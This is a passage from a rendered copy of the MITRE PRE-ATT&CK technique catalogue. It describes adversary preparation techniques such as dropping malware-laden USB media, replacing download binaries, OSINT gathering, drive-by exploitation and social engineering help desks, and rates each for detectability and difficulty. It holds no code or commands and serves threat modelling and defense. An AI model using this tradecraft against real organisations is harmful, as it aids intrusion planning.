<p>Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Unless there is some threat intelligence reporting, these users are hard to differentiate.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: The nature of social media is such that the adversary naturally connects to a target of interest without suspicion, given the purpose of the platform is to promote connections between individuals. Performing activities like typical users, but with specific intent in mind.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1561. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1121">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1121</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disseminate_removable_media_pre_t1156"><a class="anchor" href="#_disseminate_removable_media_pre_t1156"></a><a class="link" href="#_disseminate_removable_media_pre_t1156">Disseminate removable media - PRE-T1156</a></h3>
<div class="paragraph">
<p>Removable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: From a technical perspective, detection of an adversary disseminating removable media is not possible as there is no technical element involved until the compromise phase. Most facilities generally do not perform extensive physical security patrols, which would be necessary in order to promptly identify an adversary deploying removable media to be used in an attack.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Commonly executed technique by penetration testers to gain access to networks via end users who are innately trusting of newly found or available technology.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1562. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1156">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1156</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_replace_legitimate_binary_with_malware_pre_t1155"><a class="anchor" href="#_replace_legitimate_binary_with_malware_pre_t1155"></a><a class="link" href="#_replace_legitimate_binary_with_malware_pre_t1155">Replace legitimate binary with malware - PRE-T1155</a></h3>
<div class="paragraph">
<p>Replacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: On the host end user system, integrity checking (e.g., hash verification, code signing enforcement), application whitelisting, sandboxing, or behavioral-based/heuristic-based systems are most likely to be successful in detecting this technique. On the source webserver, detecting binary changes is easy to detect if performed.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires the adversary to replace a binary on a website where users will download the binary (e.g., patch, firmware update, software application) as innately trusted. The additional challenge is the reduced set of vendor-trusted websites that are vulnerable.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1563. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1155">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1155</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1054"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1054"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1054">Acquire OSINT data sets and information - PRE-T1054</a></h3>
<div class="paragraph">
<p>Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This activity is indistinguishable from legitimate business uses and easy to obtain.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1564. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_secure_and_protect_infrastructure_pre_t1094"><a class="anchor" href="#_secure_and_protect_infrastructure_pre_t1094"></a><a class="link" href="#_secure_and_protect_infrastructure_pre_t1094">Secure and protect infrastructure - PRE-T1094</a></h3>
<div class="paragraph">
<p>An adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. (Citation: KrebsTerracottaVPN)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Indistinguishable from standard security practices employed by legitimate operators.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary benefits from our own advances, techniques, and software when securing and protecting their own development infrastructure.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1565. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1094">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1094</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_firmware_version_pre_t1035"><a class="anchor" href="#_determine_firmware_version_pre_t1035"></a><a class="link" href="#_determine_firmware_version_pre_t1035">Determine firmware version - PRE-T1035</a></h3>
<div class="paragraph">
<p>Firmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: No easy way for defenders to detect when an adversary collects this information.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Depending upon the target device, there are variable ways for an adversary to determine the firmware version. In some cases, this information can be derived from easily obtained information. For example, in [<a href="http://www.cisco.com" class="bare">http://www.cisco.com</a> Cisco] devices, the firmware version is easily determined once the device model and OS version is known since it is included in the release notes.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1566. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1035">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1035</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_develop_kits_kiqs_pre_t1004"><a class="anchor" href="#_develop_kits_kiqs_pre_t1004"></a><a class="link" href="#_develop_kits_kiqs_pre_t1004">Develop KITs/KIQs - PRE-T1004</a></h3>
<div class="paragraph">
<p>Leadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management&#8217;s intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1567. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1004">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1004</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_research_relevant_vulnerabilities_cves_pre_t1068"><a class="anchor" href="#_research_relevant_vulnerabilities_cves_pre_t1068"></a><a class="link" href="#_research_relevant_vulnerabilities_cves_pre_t1068">Research relevant vulnerabilities/CVEs - PRE-T1068</a></h3>
<div class="paragraph">
<p>Common Vulnerability Enumeration (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Public source external to the defender&#8217;s organization.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Using standard headers/fingerprints from normal traffic, it is often trivial to identify the SW or HW the target is running, which can be correlated against known CVEs and exploit packages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1568. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1068">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1068</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_3rd_party_infrastructure_services_pre_t1061"><a class="anchor" href="#_determine_3rd_party_infrastructure_services_pre_t1061"></a><a class="link" href="#_determine_3rd_party_infrastructure_services_pre_t1061">Determine 3rd party infrastructure services - PRE-T1061</a></h3>
<div class="paragraph">
<p>A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary searches publicly available sources and may find this information on the 3rd party web site listing new customers/clients.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Press releases may reveal this information particularly when it is an expected cost savings or improvement for scalability/reliability.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1569. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1061">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1061</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_untargeted_client_side_exploitation_pre_t1147"><a class="anchor" href="#_untargeted_client_side_exploitation_pre_t1147"></a><a class="link" href="#_untargeted_client_side_exploitation_pre_t1147">Untargeted client-side exploitation - PRE-T1147</a></h3>
<div class="paragraph">
<p>A technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not fool proof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1570. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1147">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1147</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089"><a class="anchor" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089"></a><a class="link" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089">Compromise 3rd party infrastructure to support delivery - PRE-T1089</a></h3>
<div class="paragraph">
<p>Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Commonly used technique currently (e.g., [<a href="https://www.wordpress.com" class="bare">https://www.wordpress.com</a> WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1571. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1089">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1089</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_discover_target_logon_email_address_format_pre_t1032"><a class="anchor" href="#_discover_target_logon_email_address_format_pre_t1032"></a><a class="link" href="#_discover_target_logon_email_address_format_pre_t1032">Discover target logon/email address format - PRE-T1032</a></h3>
<div class="paragraph">
<p>Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is <a href="mailto:first.last@company.com">first.last@company.com</a> it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Easily determined and not intended to be protected information. Publicly collected and shared repositories of email addresses exist.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Scraping of known email addresses from the target will likely reveal the target standard for address/username format. This information is easily discoverable.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1572. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1032">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1032</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_public_facing_application_pre_t1154"><a class="anchor" href="#_exploit_public_facing_application_pre_t1154"></a><a class="link" href="#_exploit_public_facing_application_pre_t1154">Exploit public-facing application - PRE-T1154</a></h3>
<div class="paragraph">
<p>The use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: If the application and network are designed well, the defender should be able to utilize logging and application logic to catch and deflect SQL injection attacks.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Launching a SQL injection attack is not overly complex and a commonly used technique. This technique, however, requires finding a vulnerable application.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1573. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1154">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1154</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_kits_kiqs_benefits_pre_t1006"><a class="anchor" href="#_assess_kits_kiqs_benefits_pre_t1006"></a><a class="link" href="#_assess_kits_kiqs_benefits_pre_t1006">Assess KITs/KIQs benefits - PRE-T1006</a></h3>
<div class="paragraph">
<p>Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence)KIT.</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1574. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1006">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1006</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscate_operational_infrastructure_pre_t1095"><a class="anchor" href="#_obfuscate_operational_infrastructure_pre_t1095"></a><a class="link" href="#_obfuscate_operational_infrastructure_pre_t1095">Obfuscate operational infrastructure - PRE-T1095</a></h3>
<div class="paragraph">
<p>Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: While possible to detect given a significant sample size, depending on how the unique identifier is used detection may be difficult as similar patterns may be employed elsewhere (e.g., content hosting providers, account reset URLs).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: An adversary can easily generate pseudo-random identifiers to associate with a specific target, include the indicator as part of a URL and then identify which target was successful.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1575. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1095">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1095</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_malware_in_various_execution_environments_pre_t1134"><a class="anchor" href="#_test_malware_in_various_execution_environments_pre_t1134"></a><a class="link" href="#_test_malware_in_various_execution_environments_pre_t1134">Test malware in various execution environments - PRE-T1134</a></h3>
<div class="paragraph">
<p>Malware may perform differently on different platforms (computer vs handheld) and different operating systems ([<a href="http://www.ubuntu.com" class="bare">http://www.ubuntu.com</a> Ubuntu] vs [<a href="http://www.apple.com/osx/" class="bare">http://www.apple.com/osx/</a> OS X]), and versions ([<a href="http://windows.microsoft.com" class="bare">http://windows.microsoft.com</a> Windows] 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary controls the test and defender likely has no visibility.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary can simulate most environments (e.g., variable operating systems, patch levels, application versions) with details available from other techniques.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1576. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1134">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1134</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_centralization_of_it_management_pre_t1062"><a class="anchor" href="#_determine_centralization_of_it_management_pre_t1062"></a><a class="link" href="#_determine_centralization_of_it_management_pre_t1062">Determine centralization of IT management - PRE-T1062</a></h3>
<div class="paragraph">
<p>Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires an adversary to undergo a research process to learn the internal workings of an organization. An adversary can do this by social engineering individuals in the company by claiming to need to find information for the help desk, or through social engineering of former employees or business partners.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1577. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1062">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1062</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_physical_access_pre_t1137"><a class="anchor" href="#_test_physical_access_pre_t1137"></a><a class="link" href="#_test_physical_access_pre_t1137">Test physical access - PRE-T1137</a></h3>
<div class="paragraph">
<p>An adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender often install badging, cameras, security guards or other detection techniques for physical security and monitoring.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires a physical presence in the space being entered and increased risk of being detected/detained (e.g., recorded on video camera)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1578. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1137">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1137</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087"><a class="anchor" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087"></a><a class="link" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087">Acquire or compromise 3rd party signing certificates - PRE-T1087</a></h3>
<div class="paragraph">
<p>Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an signed piece of code even if they don&#8217;t know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1579. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1087">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1087</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_leadership_areas_of_interest_pre_t1001"><a class="anchor" href="#_assess_leadership_areas_of_interest_pre_t1001"></a><a class="link" href="#_assess_leadership_areas_of_interest_pre_t1001">Assess leadership areas of interest - PRE-T1001</a></h3>
<div class="paragraph">
<p>Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1580. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1001">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1001</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enumerate_client_configurations_pre_t1039"><a class="anchor" href="#_enumerate_client_configurations_pre_t1039"></a><a class="link" href="#_enumerate_client_configurations_pre_t1039">Enumerate client configurations - PRE-T1039</a></h3>
<div class="paragraph">
<p>Client configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Typical information collected as part of accessing web sites (e.g., operating system, browser version, basic configurations).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
